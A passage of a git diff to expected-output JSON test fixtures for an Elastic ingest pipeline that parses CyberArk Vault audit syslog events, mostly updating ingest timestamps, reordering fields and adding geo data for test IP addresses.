02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" @@ -158,7 +158,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-12-09T13:37:05.315115400Z", + "ingested": "2021-12-14T14:42:33.961904874Z", "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=1;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" @@ -241,7 +241,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-12-09T13:37:05.315123500Z", + "ingested": "2021-12-14T14:42:33.961908261Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e459\u003c/MessageID\u003e\\n \u003cDesc\u003eGeneral Audit\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eGeneral Audit\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eDual account rotation\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDualAccountStatus=Active;Index=2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGeneral Audit\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615419568\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Active\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json index 3f96e28a992..8d6459ea8d4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "the component public key for jwt authentication was updated", - "ingested": "2021-12-09T13:37:05.706900Z", + "ingested": "2021-12-14T14:42:34.345353818Z", "original": "\u003c5\u003e1 2021-03-10T18:14:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:14:35\",\"IsoTimestamp\":\"2021-03-10T18:14:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"467\",\"Desc\":\"The component public key for JWT authentication was updated\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"The component public key for JWT authentication was updated\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"The component public key for JWT authentication was updated\",\"GatewayStation\":\"\"}}}", "code": "467", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json index f86608120b8..c36b188ae81 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", @@ -44,15 +37,22 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:05.810861Z", + "ingested": "2021-12-14T14:42:34.464989468Z", "original": "\u003c7\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", "action": "security warning - the signature hash algorithm of the vault certificate is sha1.", "type": "error" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:05.810869800Z", + "ingested": "2021-12-14T14:42:34.464992773Z", "original": "Mar 08 07:46:54 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json index 53c760d0864..2b30b915b38 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "update existing add account bulk operation succeeded", - "ingested": "2021-12-09T13:37:05.981143100Z", + "ingested": "2021-12-14T14:42:34.658542393Z", "original": "\u003c5\u003e1 2021-03-10T08:31:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:49\",\"IsoTimestamp\":\"2021-03-10T08:31:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"482\",\"Desc\":\"Update existing Add Account Bulk Operation succeeded\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Update existing Add Account Bulk Operation succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update existing Add Account Bulk Operation succeeded\",\"GatewayStation\":\"\"}}}", "code": "482", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json index 3b417a619cf..d3406f2e309 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052356900Z", + "ingested": "2021-12-14T14:42:34.777873875Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -65,6 +65,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -110,7 +119,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052364800Z", + "ingested": "2021-12-14T14:42:34.777876388Z", "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"Root\\\\syntaxparser-conf.json.1.1\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -168,7 +177,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052371300Z", + "ingested": "2021-12-14T14:42:34.777876823Z", "original": "\u003c5\u003e1 2021-03-10T18:36:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:36:22\",\"IsoTimestamp\":\"2021-03-10T18:36:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -181,6 +190,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -226,7 +244,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052377200Z", + "ingested": "2021-12-14T14:42:34.777877218Z", "original": "\u003c5\u003e1 2021-03-10T22:17:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:56\",\"IsoTimestamp\":\"2021-03-10T22:17:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -239,6 +257,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -285,7 +312,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052383700Z", + "ingested": "2021-12-14T14:42:34.777877610Z", "original": "\u003c5\u003e1 2021-03-11T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:27\",\"IsoTimestamp\":\"2021-03-11T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -353,7 +380,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-12-09T13:37:06.052388Z", + "ingested": "2021-12-14T14:42:34.777877998Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e50\u003c/MessageID\u003e\\n \u003cDesc\u003eStore File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "50", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json index 14ef75b4cb3..cc9107bce92 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-51-retrieve-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:06.666779900Z", + "ingested": "2021-12-14T14:42:35.435739231Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 